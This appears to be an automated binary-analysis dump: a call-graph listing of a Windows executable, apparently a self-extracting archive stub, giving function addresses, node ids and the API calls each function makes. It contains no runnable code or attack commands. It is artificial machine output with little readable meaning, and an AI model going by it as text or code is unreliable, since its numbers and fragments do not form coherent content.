ca178d ___std_exception_copy 24464->24465 24466 ca17c7 24464->24466 24465->24474 24477 ca6ca7 75 API calls 24465->24477 24469 cc3e3e 22 API calls 24466->24469 24468 ca1767 24476 ca6ca7 75 API calls 24468->24476 24471 ca17ce 24469->24471 24471->24474 24478 ca6ca7 75 API calls 24471->24478 24474->24450 24475->24468 24476->24464 24477->24474 24478->24474 24479->24453 24480->24456 24482 cacf4d 24481->24482 24484 cacf54 24481->24484 24486 ca981a 24482->24486 24484->24329 24485->24331 24487 ca9833 24486->24487 24489 ca9e80 79 API calls 24487->24489 24488 ca9865 24488->24484 24489->24488 24491 cbde78 24490->24491 24492 cae617 53 API calls 24491->24492 24493 cbde9b 24492->24493 24494 ca4092 _swprintf 51 API calls 24493->24494 24495 cbdead 24494->24495 24496 cbd4d4 16 API calls 24495->24496 24497 cb1b7c 24496->24497 24497->24284 24499 ca19bf 24498->24499 24502 ca19bb 24498->24502 24503 ca9e80 79 API calls 24499->24503 24500 ca19d4 24504 ca18f6 24500->24504 24502->24338 24503->24500 24505 ca1908 24504->24505 24506 ca1945 24504->24506 24507 ca3b2d 102 API calls 24505->24507 24512 ca3fa3 24506->24512 24510 ca1928 24507->24510 24510->24502 24515 ca3fac 24512->24515 24513 ca3b2d 102 API calls 24513->24515 24515->24513 24516 ca1966 24515->24516 24529 cb0e08 24515->24529 24516->24510 24517 ca1e50 24516->24517 24518 ca1e5a __EH_prolog 24517->24518 24537 ca3bba 24518->24537 24520 ca1e84 24521 ca1732 78 API calls 24520->24521 24523 ca1f0b 24520->24523 24522 ca1e9b 24521->24522 24565 ca18a9 78 API calls 24522->24565 24523->24510 24525 ca1eb3 24527 ca1ebf _wcslen 24525->24527 24566 cb1b84 MultiByteToWideChar 24525->24566 24567 ca18a9 78 API calls 24527->24567 24530 cb0e0f 24529->24530 24531 cb0e2a 24530->24531 24535 ca6c31 RaiseException _com_raise_error 24530->24535 24533 cb0e3b SetThreadExecutionState 24531->24533 24536 ca6c31 RaiseException _com_raise_error 24531->24536 24533->24515 24535->24531 24536->24533 24538 ca3bc4 __EH_prolog 24537->24538 24539 ca3bda 24538->24539 24540 
ca3bf6 24538->24540 24593 ca138b 74 API calls 24539->24593 24542 ca3e51 24540->24542 24545 ca3c22 24540->24545 24618 ca138b 74 API calls 24542->24618 24544 ca3be5 24544->24520 24545->24544 24568 cb3377 24545->24568 24547 ca3ca3 24548 ca3d2e 24547->24548 24564 ca3c9a 24547->24564 24596 cad051 24547->24596 24578 caab1a 24548->24578 24549 ca3c9f 24549->24547 24595 ca20bd 78 API calls 24549->24595 24551 ca3c8f 24594 ca138b 74 API calls 24551->24594 24552 ca3c71 24552->24547 24552->24549 24552->24551 24554 ca3d41 24558 ca3dd7 24554->24558 24559 ca3dc7 24554->24559 24602 cb3020 24558->24602 24582 ca9215 24559->24582 24562 ca3dd5 24562->24564 24611 ca2021 74 API calls 24562->24611 24612 cb2297 24564->24612 24565->24525 24566->24527 24567->24523 24569 cb338c 24568->24569 24571 cb3396 ___std_exception_copy 24568->24571 24619 ca6ca7 75 API calls 24569->24619 24572 cb341c 24571->24572 24573 cb34c6 24571->24573 24577 cb3440 __cftof 24571->24577 24620 cb32aa 75 API calls 3 library calls 24572->24620 24621 cc238d RaiseException 24573->24621 24576 cb34f2 24577->24552 24579 caab28 24578->24579 24581 caab32 24578->24581 24580 cbeb38 8 API calls 24579->24580 24580->24581 24581->24554 24583 ca921f __EH_prolog 24582->24583 24622 ca7c64 24583->24622 24586 ca13ba 78 API calls 24587 ca9231 24586->24587 24625 cad114 24587->24625 24589 ca928a 24589->24562 24591 cad114 119 API calls 24592 ca9243 24591->24592 24592->24589 24592->24591 24634 cad300 97 API calls __InternalCxxFrameHandler 24592->24634 24593->24544 24594->24564 24595->24547 24597 cad072 24596->24597 24598 cad084 24596->24598 24635 ca603a 82 API calls 24597->24635 24636 ca603a 82 API calls 24598->24636 24601 cad07c 24601->24548 24603 cb3029 24602->24603 24604 cb3052 24602->24604 24606 cb3048 24603->24606 24608 cb303e 24603->24608 24610 cb3046 24603->24610 24604->24610 24651 cb552f 124 API calls 2 library calls 24604->24651 24650 cb624a 119 API calls 24606->24650 24637 cb6cdc 24608->24637 24610->24562 24611->24564 24614 cb22a1 
24612->24614 24613 cb22ba 24652 cb0eed 86 API calls 24613->24652 24614->24613 24617 cb22ce 24614->24617 24616 cb22c1 24616->24617 24618->24544 24619->24571 24620->24577 24621->24576 24623 cab146 GetVersionExW 24622->24623 24624 ca7c69 24623->24624 24624->24586 24631 cad12a __InternalCxxFrameHandler 24625->24631 24626 cad29a 24627 cad2ce 24626->24627 24628 cad0cb 6 API calls 24626->24628 24629 cb0e08 SetThreadExecutionState RaiseException 24627->24629 24628->24627 24632 cad291 24629->24632 24630 cb8c8d 104 API calls 24630->24631 24631->24626 24631->24630 24631->24632 24633 caac05 91 API calls 24631->24633 24632->24592 24633->24631 24634->24592 24635->24601 24636->24601 24638 cb359e 75 API calls 24637->24638 24645 cb6ced __InternalCxxFrameHandler 24638->24645 24639 cad114 119 API calls 24639->24645 24640 cb70fe 24641 cb5202 98 API calls 24640->24641 24642 cb710e __InternalCxxFrameHandler 24641->24642 24642->24610 24643 cb11cf 81 API calls 24643->24645 24644 cb3e0b 119 API calls 24644->24645 24645->24639 24645->24640 24645->24643 24645->24644 24646 cb7153 119 API calls 24645->24646 24647 cb0f86 88 API calls 24645->24647 24648 cb77ef 124 API calls 24645->24648 24649 cb390d 98 API calls 24645->24649 24646->24645 24647->24645 24648->24645 24649->24645 24650->24610 24651->24610 24652->24616 24653->24347 24654->24347 24655->24349 24657 ca5d2a 24656->24657 24702 ca5c4b 24657->24702 24659 ca5d5d 24661 ca5d95 24659->24661 24707 cab1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24659->24707 24661->24363 24663 ca8186 24662->24663 24664 ca8232 24663->24664 24714 cabe5e 19 API calls __InternalCxxFrameHandler 24663->24714 24713 cb1fac CharUpperW 24664->24713 24667 ca823b 24667->24366 24669 ca7c22 24668->24669 24670 ca7c5a 24669->24670 24715 ca6e7a 74 API calls 24669->24715 24670->24376 24672 ca7c52 24716 ca138b 74 API calls 24672->24716 24675 ca9db3 24674->24675 24678 ca9dc2 24674->24678 24676 ca9db9 FlushFileBuffers 24675->24676 24675->24678 24676->24678 24677 ca9e3f 
SetFileTime 24677->24434 24678->24677 24679->24355 24680->24362 24681->24362 24682->24376 24683->24376 24684->24372 24685->24382 24686->24378 24687->24382 24689 ca8b5a 24688->24689 24690 ca98c5 GetFileType 24688->24690 24689->24398 24691 ca2021 74 API calls 24689->24691 24690->24689 24691->24396 24692->24398 24693->24400 24694->24424 24695->24424 24696->24424 24697->24424 24698->24427 24699->24429 24700->24437 24701->24428 24708 ca5b48 24702->24708 24704 ca5c6c 24704->24659 24706 ca5b48 2 API calls 24706->24704 24707->24659 24710 ca5b52 24708->24710 24709 ca5c3a 24709->24704 24709->24706 24710->24709 24712 cab1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24710->24712 24712->24710 24713->24667 24714->24664 24715->24672 24716->24670 24718->24445 24720 caa6a8 24719->24720 24721 caa6c1 FindFirstFileW 24720->24721 24722 caa727 FindNextFileW 24720->24722 24723 caa6d0 24721->24723 24729 caa709 24721->24729 24724 caa732 GetLastError 24722->24724 24722->24729 24725 cabb03 GetCurrentDirectoryW 24723->24725 24724->24729 24726 caa6e0 24725->24726 24727 caa6fe GetLastError 24726->24727 24728 caa6e4 FindFirstFileW 24726->24728 24727->24729 24728->24727 24728->24729 24729->24297 24739 cba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24730->24739 24732 cba5cd 24733 cba5d9 24732->24733 24740 cba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24732->24740 24733->24097 24733->24098 24735->24101 24736->24107 24737->24107 24738->24110 24739->24732 24740->24733 24741->24115 24743 ca9f42 78 API calls 24742->24743 24744 ca1fe8 24743->24744 24745 ca1a04 102 API calls 24744->24745 24748 ca2005 24744->24748 24746 ca1ff5 24745->24746 24746->24748 24749 ca138b 74 API calls 24746->24749 24748->24124 24748->24125 24749->24748 24750 ca13e1 84 API calls 2 library calls 25517 cb94e0 GetClientRect 25552 cb21e0 26 API calls std::bad_exception::bad_exception 25578 cbf2e0 46 API calls __RTC_Initialize 24751 cbeae7 24752 cbeaf1 24751->24752 24753 cbe85d ___delayLoadHelper2@8 14 API calls 
24752->24753 24754 cbeafe 24753->24754 25518 cbf4e7 29 API calls _abort 25579 ccbee0 GetCommandLineA GetCommandLineW 25519 cc2cfb 38 API calls 4 library calls 25553 ca95f0 80 API calls 25554 cbfd4f 9 API calls 2 library calls 25580 ca5ef0 82 API calls 24771 cc98f0 24779 ccadaf 24771->24779 24775 cc990c 24776 cc9919 24775->24776 24787 cc9920 11 API calls 24775->24787 24778 cc9904 24788 ccac98 24779->24788 24782 ccadee TlsAlloc 24785 ccaddf 24782->24785 24783 cbfbbc CatchGuardHandler 5 API calls 24784 cc98fa 24783->24784 24784->24778 24786 cc9869 20 API calls 2 library calls 24784->24786 24785->24783 24786->24775 24787->24778 24789 ccacc8 24788->24789 24793 ccacc4 24788->24793 24789->24782 24789->24785 24790 ccace8 24790->24789 24792 ccacf4 GetProcAddress 24790->24792 24794 ccad04 __dosmaperr 24792->24794 24793->24789 24793->24790 24795 ccad34 24793->24795 24794->24789 24796 ccad4a 24795->24796 24797 ccad55 LoadLibraryExW 24795->24797 24796->24793 24798 ccad72 GetLastError 24797->24798 24800 ccad8a 24797->24800 24799 ccad7d LoadLibraryExW 24798->24799 24798->24800 24799->24800 24800->24796 24801 ccada1 FreeLibrary 24800->24801 24801->24796 24802 ccabf0 24803 ccabfb 24802->24803 24805 ccac24 24803->24805 24806 ccac20 24803->24806 24808 ccaf0a 24803->24808 24815 ccac50 DeleteCriticalSection 24805->24815 24809 ccac98 __dosmaperr 5 API calls 24808->24809 24810 ccaf31 24809->24810 24811 ccaf4f InitializeCriticalSectionAndSpinCount 24810->24811 24812 ccaf3a 24810->24812 24811->24812 24813 cbfbbc CatchGuardHandler 5 API calls 24812->24813 24814 ccaf66 24813->24814 24814->24803 24815->24806 25520 cc88f0 7 API calls ___scrt_uninitialize_crt 25522 cbc793 98 API calls 4 library calls 25557 cbb18d 78 API calls 25559 cb9580 6 API calls 24830 cbce87 24831 cbce90 GetTempPathW 24830->24831 24849 cbc793 _wcslen _wcsrchr 24830->24849 24836 cbceb0 24831->24836 24832 cbb314 ExpandEnvironmentStringsW 24832->24849 24833 cbd40a 24834 ca4092 _swprintf 51 API calls 24834->24836 24835 caa231 
3 API calls 24835->24836 24836->24834 24836->24835 24837 cbcee7 SetDlgItemTextW 24836->24837 24840 cbcf04 24837->24840 24837->24849 24839 cbca67 SetWindowTextW 24839->24849 24843 cbcfea EndDialog 24840->24843 24840->24849 24843->24849 24844 cc3e3e 22 API calls 24844->24849 24846 cbc855 SetFileAttributesW 24848 cbc90f GetFileAttributesW 24846->24848 24859 cbc86f __cftof _wcslen 24846->24859 24848->24849 24851 cbc921 DeleteFileW 24848->24851 24849->24832 24849->24833 24849->24839 24849->24844 24849->24846 24852 cbcc31 GetDlgItem SetWindowTextW SendMessageW 24849->24852 24855 cbcc71 SendMessageW 24849->24855 24861 cb1fbb CompareStringW 24849->24861 24862 cba64d GetCurrentDirectoryW 24849->24862 24864 caa5d1 6 API calls 24849->24864 24865 caa55a FindClose 24849->24865 24866 cbb48e 76 API calls 2 library calls 24849->24866 24851->24849 24853 cbc932 24851->24853 24852->24849 24854 ca4092 _swprintf 51 API calls 24853->24854 24856 cbc952 GetFileAttributesW 24854->24856 24855->24849 24856->24853 24857 cbc967 MoveFileW 24856->24857 24857->24849 24858 cbc97f MoveFileExW 24857->24858 24858->24849 24859->24849 24860 cbc8eb SHFileOperationW 24859->24860 24863 cab991 51 API calls 2 library calls 24859->24863 24860->24848 24861->24849 24862->24849 24863->24859 24864->24849 24865->24849 24866->24849 25596 ca6faa 111 API calls 3 library calls 25525 cbdca1 DialogBoxParamW 25597 cbf3a0 27 API calls 25527 cca4a0 71 API calls _free 25561 cbeda7 48 API calls _unexpected 25529 cd08a0 IsProcessorFeaturePresent 25562 ccb1b8 27 API calls 3 library calls 25598 cb1bbd GetCPInfo IsDBCSLeadByte 24887 cbf3b2 24888 cbf3be ___scrt_is_nonwritable_in_current_image 24887->24888 24919 cbeed7 24888->24919 24890 cbf3c5 24891 cbf518 24890->24891 24894 cbf3ef 24890->24894 24992 cbf838 4 API calls 2 library calls 24891->24992 24893 cbf51f 24985 cc7f58 24893->24985 24906 cbf42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24894->24906 24930 cc8aed 24894->24930 24901 cbf40e 24903 
cbf48f 24938 cbf953 GetStartupInfoW __cftof 24903->24938 24905 cbf495 24939 cc8a3e 51 API calls 24905->24939 24906->24903 24988 cc7af4 38 API calls 3 library calls 24906->24988 24909 cbf49d 24940 cbdf1e 24909->24940 24913 cbf4b1 24913->24893 24914 cbf4b5 24913->24914 24915 cbf4be 24914->24915 24990 cc7efb 28 API calls _abort 24914->24990 24991 cbf048 12 API calls ___scrt_uninitialize_crt 24915->24991 24918 cbf4c6 24918->24901 24920 cbeee0 24919->24920 24994 cbf654 IsProcessorFeaturePresent 24920->24994 24922 cbeeec 24995 cc2a5e 24922->24995 24924 cbeef1 24925 cbeef5 24924->24925 25003 cc8977 24924->25003 24925->24890 24928 cbef0c 24928->24890 24931 cc8b04 24930->24931 24932 cbfbbc CatchGuardHandler 5 API calls 24931->24932 24933 cbf408 24932->24933 24933->24901 24934 cc8a91 24933->24934 24935 cc8ac0 24934->24935 24936 cbfbbc CatchGuardHandler 5 API calls 24935->24936 24937 cc8ae9 24936->24937 24937->24906 24938->24905 24939->24909 25096 cb0863 24940->25096 24944 cbdf3d 25145 cbac16 24944->25145 24946 cbdf46 __cftof 24947 cbdf59 GetCommandLineW 24946->24947 24948 cbdf68 24947->24948 24949 cbdfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24947->24949 25149 cbc5c4 24948->25149 24950 ca4092 _swprintf 51 API calls 24949->24950 24952 cbe04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24950->24952 25160 cbb6dd LoadBitmapW 24952->25160 24955 cbdfe0 25154 cbdbde 24955->25154 24956 cbdf76 OpenFileMappingW 24959 cbdf8f MapViewOfFile 24956->24959 24960 cbdfd6 CloseHandle 24956->24960 24962 cbdfcd UnmapViewOfFile 24959->24962 24963 cbdfa0 __InternalCxxFrameHandler 24959->24963 24960->24949 24962->24960 24967 cbdbde 2 API calls 24963->24967 24969 cbdfbc 24967->24969 24968 cb90b7 8 API calls 24970 cbe0aa DialogBoxParamW 24968->24970 24969->24962 24971 cbe0e4 24970->24971 24972 cbe0fd 24971->24972 24973 cbe0f6 Sleep 24971->24973 24976 cbe10b 24972->24976 25187 cbae2f 24972->25187 24973->24972 24975 cbe12a DeleteObject 24977 cbe13f DeleteObject 24975->24977 
24978 cbe146 24975->24978 24976->24975 24977->24978 24979 cbe189 24978->24979 24980 cbe177 24978->24980 25195 cbac7c 24979->25195 24981 cbdc3b 6 API calls 24980->24981 24982 cbe17d CloseHandle 24981->24982 24982->24979 24984 cbe1c3 24989 cbf993 GetModuleHandleW 24984->24989 25333 cc7cd5 24985->25333 24988->24903 24989->24913 24990->24915 24991->24918 24992->24893 24994->24922 25007 cc3b07 24995->25007 24998 cc2a67 24998->24924 25000 cc2a6f 25001 cc2a7a 25000->25001 25021 cc3b43 DeleteCriticalSection 25000->25021 25001->24924 25050 ccc05a 25003->25050 25006 cc2a7d 7 API calls 2 library calls 25006->24925 25008 cc3b10 25007->25008 25010 cc3b39 25008->25010 25011 cc2a63 25008->25011 25022 cc3d46 25008->25022 25027 cc3b43 DeleteCriticalSection 25010->25027 25011->24998 25013 cc2b8c 25011->25013 25043 cc3c57 25013->25043 25016 cc2ba1 25016->25000 25018 cc2baf 25019 cc2bbc 25018->25019 25049 cc2bbf 6 API calls ___vcrt_FlsFree 25018->25049 25019->25000 25021->24998 25028 cc3c0d 25022->25028 25025 cc3d7e InitializeCriticalSectionAndSpinCount 25026 cc3d69 25025->25026 25026->25008 25027->25011 25029 cc3c4f 25028->25029 25030 cc3c26 25028->25030 25029->25025 25029->25026 25030->25029 25035 cc3b72 25030->25035 25033 cc3c3b GetProcAddress 25033->25029 25034 cc3c49 25033->25034 25034->25029 25036 cc3b7e ___vcrt_FlsSetValue 25035->25036 25037 cc3bf3 25036->25037 25038 cc3b95 LoadLibraryExW 25036->25038 25042 cc3bd5 LoadLibraryExW 25036->25042 25037->25029 25037->25033 25039 cc3bfa 25038->25039 25040 cc3bb3 GetLastError 25038->25040 25039->25037 25041 cc3c02 FreeLibrary 25039->25041 25040->25036 25041->25037 25042->25036 25042->25039 25044 cc3c0d ___vcrt_FlsSetValue 5 API calls 25043->25044 25045 cc3c71 25044->25045 25046 cc3c8a TlsAlloc 25045->25046 25047 cc2b96 25045->25047 25047->25016 25048 cc3d08 6 API calls ___vcrt_FlsSetValue 25047->25048 25048->25018 25049->25016 25053 ccc077 25050->25053 25054 ccc073 25050->25054 25051 cbfbbc CatchGuardHandler 5 API calls 25052 cbeefe 
25051->25052 25052->24928 25052->25006 25053->25054 25056 cca6a0 25053->25056 25054->25051 25057 cca6ac ___scrt_is_nonwritable_in_current_image 25056->25057 25068 ccac31 EnterCriticalSection 25057->25068 25059 cca6b3 25069 ccc528 25059->25069 25061 cca6c2 25066 cca6d1 25061->25066 25082 cca529 29 API calls 25061->25082 25064 cca6cc 25083 cca5df GetStdHandle GetFileType 25064->25083 25084 cca6ed LeaveCriticalSection _abort 25066->25084 25067 cca6e2 _abort 25067->25053 25068->25059 25070 ccc534 ___scrt_is_nonwritable_in_current_image 25069->25070 25071 ccc558 25070->25071 25072 ccc541 25070->25072 25085 ccac31 EnterCriticalSection 25071->25085 25093 cc91a8 20 API calls __dosmaperr 25072->25093 25075 ccc546 25094 cc9087 26 API calls ___std_exception_copy 25075->25094 25077 ccc550 _abort 25077->25061 25078 ccc590 25095 ccc5b7 LeaveCriticalSection _abort 25078->25095 25080 ccc564 25080->25078 25086 ccc479 25080->25086 25082->25064 25083->25066 25084->25067 25085->25080 25087 ccb136 __dosmaperr 20 API calls 25086->25087 25088 ccc48b 25087->25088 25090 ccaf0a 11 API calls 25088->25090 25092 ccc498 25088->25092 25089 cc8dcc _free 20 API calls 25091 ccc4ea 25089->25091 25090->25088 25091->25080 25092->25089 25093->25075 25094->25077 25095->25077 25097 cbec50 25096->25097 25098 cb086d GetModuleHandleW 25097->25098 25099 cb0888 GetProcAddress 25098->25099 25100 cb08e7 25098->25100 25102 cb08b9 GetProcAddress 25099->25102 25105 cb08a1 25099->25105 25101 cb0c14 GetModuleFileNameW 25100->25101 25207 cc75fb 42 API calls __vsnwprintf_l 25100->25207 25117 cb0c32 25101->25117 25106 cb08cb 25102->25106 25104 cb0b54 25104->25101 25107 cb0b5f GetModuleFileNameW CreateFileW 25104->25107 25105->25102 25106->25100 25108 cb0c08 CloseHandle 25107->25108 25109 cb0b8f SetFilePointer 25107->25109 25108->25101 25109->25108 25110 cb0b9d ReadFile 25109->25110 25110->25108 25112 cb0bbb 25110->25112 25112->25108 25118 cb081b 2 API calls 25112->25118 25114 cb0c94 GetFileAttributesW 25116 cb0cac 
25114->25116 25114->25117 25115 cb0c5d CompareStringW 25115->25117 25119 cb0cb7 25116->25119 25121 cb0cec 25116->25121 25117->25114 25117->25115 25117->25116 25198 cab146 25117->25198 25201 cb081b 25117->25201 25118->25112 25122 cb0cd0 GetFileAttributesW 25119->25122 25124 cb0ce8 25119->25124 25120 cb0dfb 25144 cba64d GetCurrentDirectoryW 25120->25144 25121->25120 25123 cab146 GetVersionExW 25121->25123 25122->25119 25122->25124 25125 cb0d06 25123->25125 25124->25121 25126 cb0d0d 25125->25126 25127 cb0d73 25125->25127 25129 cb081b 2 API calls 25126->25129 25128 ca4092 _swprintf 51 API calls 25127->25128 25130 cb0d9b AllocConsole 25128->25130 25131 cb0d17 25129->25131 25132 cb0da8 GetCurrentProcessId AttachConsole 25130->25132 25133 cb0df3 ExitProcess 25130->25133 25134 cb081b 2 API calls 25131->25134 25208 cc3e13 25132->25208 25136 cb0d21 25134->25136 25138 cae617 53 API calls 25136->25138 25139 cb0d3c 25138->25139 25140 ca4092 _swprintf 51 API calls 25139->25140 25141 cb0d4f 25140->25141 25142 cae617 53 API calls 25141->25142 25143 cb0d5e 25142->25143 25143->25133 25144->24944 25146 cb081b 2 API calls 25145->25146 25147 cbac2a OleInitialize 25146->25147 25148 cbac4d GdiplusStartup SHGetMalloc 25147->25148 25148->24946 25152 cbc5ce 25149->25152 25150 cbc6e4 25150->24955 25150->24956 25151 cb1fac CharUpperW 25151->25152 25152->25150 25152->25151 25210 caf3fa 82 API calls 2 library calls 25152->25210 25155 cbec50 25154->25155 25156 cbdbeb SetEnvironmentVariableW 25155->25156 25158 cbdc0e 25156->25158 25157 cbdc36 25157->24949 25158->25157 25159 cbdc2a SetEnvironmentVariableW 25158->25159 25159->25157 25161 cbb70b GetObjectW 25160->25161 25162 cbb6fe 25160->25162 25164 cbb71a 25161->25164 25211 cba6c2 FindResourceW 25162->25211 25165 cba5c6 4 API calls 25164->25165 25167 cbb72d 25165->25167 25168 cbb770 25167->25168 25169 cbb74c 25167->25169 25170 cba6c2 13 API calls 25167->25170 25179 cada42 25168->25179 25227 cba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 
25169->25227 25172 cbb73d 25170->25172 25172->25169 25174 cbb743 DeleteObject 25172->25174 25173 cbb754 25228 cba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25173->25228 25174->25169 25176 cbb75d 25229 cba80c 8 API calls 25176->25229 25178 cbb764 DeleteObject 25178->25168 25238 cada67 25179->25238 25184 cb90b7 25185 cbeb38 8 API calls 25184->25185 25186 cb90d6 25185->25186 25186->24968 25188 cbae3c 25187->25188 25191 cbaeca 25188->25191 25329 cb1fdd 25188->25329 25190 cbae64 25190->25191 25332 cbac04 SetCurrentDirectoryW 25190->25332 25191->24976 25193 cbae72 __cftof _wcslen 25194 cbaea6 SHFileOperationW 25193->25194 25194->25191 25196 cbacab GdiplusShutdown CoUninitialize 25195->25196 25196->24984 25199 cab15a GetVersionExW 25198->25199 25200 cab196 25198->25200 25199->25200 25200->25117 25202 cbec50 25201->25202 25203 cb0828 GetSystemDirectoryW 25202->25203 25204 cb085e 25203->25204 25205 cb0840 25203->25205 25204->25117 25206 cb0851 LoadLibraryW 25205->25206 25206->25204 25207->25104 25209 cb0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25208->25209 25209->25133 25210->25152 25212 cba6e5 SizeofResource 25211->25212 25213 cba7d3 25211->25213 25212->25213 25214 cba6fc LoadResource 25212->25214 25213->25161 25213->25164 25214->25213 25215 cba711 LockResource 25214->25215 25215->25213 25216 cba722 GlobalAlloc 25215->25216 25216->25213 25217 cba73d GlobalLock 25216->25217 25218 cba7cc GlobalFree 25217->25218 25219 cba74c __InternalCxxFrameHandler 25217->25219 25218->25213 25220 cba754 CreateStreamOnHGlobal 25219->25220 25221 cba76c 25220->25221 25222 cba7c5 GlobalUnlock 25220->25222 25230 cba626 GdipAlloc 25221->25230 25222->25218 25225 cba79a GdipCreateHBITMAPFromBitmap 25226 cba7b0 25225->25226 25226->25222 25227->25173 25228->25176 25229->25178 25231 cba638 25230->25231 25233 cba645 25230->25233 25234 cba3b9 25231->25234 25233->25222 25233->25225 25233->25226 25235 cba3da GdipCreateBitmapFromStreamICM 25234->25235 25236 cba3e1 GdipCreateBitmapFromStream 
25234->25236 25237 cba3e6 25235->25237 25236->25237 25237->25233 25239 cada75 __EH_prolog 25238->25239 25240 cadaa4 GetModuleFileNameW 25239->25240 25241 cadad5 25239->25241 25242 cadabe 25240->25242 25284 ca98e0 25241->25284 25242->25241 25244 cadb31 25295 cc6310 25244->25295 25245 ca959a 80 API calls 25246 cada4e 25245->25246 25282 cae29e GetModuleHandleW FindResourceW 25246->25282 25248 cadb05 25248->25244 25251 cae261 78 API calls 25248->25251 25262 cadd4a 25248->25262 25249 cadb44 25250 cc6310 26 API calls 25249->25250 25259 cadb56 ___vcrt_FlsSetValue 25250->25259 25251->25248 25252 cadc85 25252->25262 25315 ca9d70 81 API calls 25252->25315 25254 ca9e80 79 API calls 25254->25259 25256 cadc9f ___std_exception_copy 25257 ca9bd0 82 API calls 25256->25257 25256->25262 25260 cadcc8 ___std_exception_copy 25257->25260 25259->25252 25259->25254 25259->25262 25309 ca9bd0 25259->25309 25314 ca9d70 81 API calls 25259->25314 25260->25262 25279 cadcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 25260->25279 25316 cb1b84 MultiByteToWideChar 25260->25316 25262->25245 25263 cae159 25269 cae1de 25263->25269 25322 cc8cce 26 API calls ___std_exception_copy 25263->25322 25266 cae16e 25323 cc7625 26 API calls ___std_exception_copy 25266->25323 25268 cae1c6 25324 cae27c 78 API calls 25268->25324 25270 cae214 25269->25270 25272 cae261 78 API calls 25269->25272 25273 cc6310 26 API calls 25270->25273 25272->25269 25274 cae22d 25273->25274 25275 cc6310 26 API calls 25274->25275 25275->25262 25278 cb1da7 WideCharToMultiByte 25278->25279 25279->25262 25279->25263 25279->25278 25317 cae5b1 50 API calls __vsnprintf 25279->25317 25318 cc6159 26 API calls 3 library calls 25279->25318 25319 cc8cce 26 API calls ___std_exception_copy 25279->25319 25320 cc7625 26 API calls ___std_exception_copy 25279->25320 25321 cae27c 78 API calls 25279->25321 25283 cada55 25282->25283 25283->25184 25285 ca98ea 25284->25285 25286 ca994b CreateFileW 25285->25286 25287 ca996c GetLastError 25286->25287 
25290 ca99bb 25286->25290 25288 cabb03 GetCurrentDirectoryW 25287->25288 25289 ca998c 25288->25289 25289->25290 25292 ca9990 CreateFileW GetLastError 25289->25292 25291 ca99ff 25290->25291 25293 ca99e5 SetFileTime 25290->25293 25291->25248 25292->25290 25294 ca99b5 25292->25294 25293->25291 25294->25290 25296 cc6349 25295->25296 25297 cc634d 25296->25297 25308 cc6375 25296->25308 25325 cc91a8 20 API calls __dosmaperr 25297->25325 25299 cc6699 25302 cbfbbc CatchGuardHandler 5 API calls 25299->25302 25300 cc6352 25326 cc9087 26 API calls ___std_exception_copy 25300->25326 25304 cc66a6 25302->25304 25303 cc635d 25305 cbfbbc CatchGuardHandler 5 API calls 25303->25305 25304->25249 25306 cc6369 25305->25306 25306->25249 25308->25299 25327 cc6230 5 API calls CatchGuardHandler 25308->25327 25310 ca9bdc 25309->25310 25313 ca9be3 25309->25313 25310->25259 25311 ca9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25311->25313 25313->25310 25313->25311 25328 ca6d1a 77 API calls 25313->25328 25314->25259 25315->25256 25316->25279 25317->25279 25318->25279 25319->25279 25320->25279 25321->25279 25322->25266 25323->25268 25324->25269 25325->25300 25326->25303 25327->25308 25328->25313 25330 cb1fea _wcslen 25329->25330 25331 cb201d CompareStringW 25330->25331 25331->25190 25332->25193 25334 cc7ce1 _unexpected 25333->25334 25335 cc7ce8 25334->25335 25336 cc7cfa 25334->25336 25369 cc7e2f GetModuleHandleW 25335->25369 25357 ccac31 EnterCriticalSection 25336->25357 25339 cc7ced 25339->25336 25370 cc7e73 GetModuleHandleExW 25339->25370 25340 cc7d9f 25358 cc7ddf 25340->25358 25344 cc7d76 25348 cc7d8e 25344->25348 25353 cc8a91 _abort 5 API calls 25344->25353 25346 cc7dbc 25361 cc7dee 25346->25361 25347 cc7de8 25379 cd2390 5 API calls CatchGuardHandler 25347->25379 25354 cc8a91 _abort 5 API calls 25348->25354 25349 cc7d01 25349->25340 25349->25344 25378 cc87e0 20 API calls _abort 25349->25378 25353->25348 25354->25340 25357->25349 25380 ccac81 LeaveCriticalSection 
Control-flow graph (rendered call-graph edge list; the node-to-node edges are dropped here, the API-bearing nodes are kept and grouped by function):
• 00CC7DB8..00CC7ECF (CRT abort / terminate path): GetPEB, GetCurrentProcess -> TerminateProcess, ExitProcess; GetProcAddress, FreeLibrary.
• 00CBE3F4..00CBEAC3 (___delayLoadHelper2@8): GetModuleHandleW + GetProcAddress x2, LoadLibraryExA -> GetLastError, GetProcAddress -> GetLastError, FreeLibrary, RaiseException on each failure path; DloadProtectSection / DloadReleaseSectionWriteAccess: VirtualQuery, GetSystemInfo, VirtualProtect.
• 00CBCD58 / 00CBC793 (file replace and move logic): CompareStringW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, _swprintf, MoveFileW, MoveFileExW, SHFileOperationW, ExpandEnvironmentStringsW, GetCurrentDirectoryW, FindClose, GetDlgItem / SetWindowTextW / SendMessageW (progress dialog updates).
• 00CBD78F (launch a child process and wait for it): GetFullPathNameW x2, GetCurrentDirectoryW, GetFileAttributesW, ShellExecuteExW, IsWindowVisible, ShowWindow, WaitForInputIdle, WaitForSingleObject inside a PeekMessageW / GetMessageW / TranslateMessage / DispatchMessageW pump, GetExitCodeProcess, CloseHandle.
• 00CA9F7A: GetStdHandle, WriteFile; 00CA9A74: SetFilePointer, GetLastError.
• CRT heap and code-page helpers: GetProcessHeap, RtlAllocateHeap, HeapReAlloc, GetOEMCP, GetACP, IsValidCodePage, GetCPInfo, MultiByteToWideChar, WideCharToMultiByte, GetStringTypeW, LCMapStringW, EnterCriticalSection / LeaveCriticalSection.
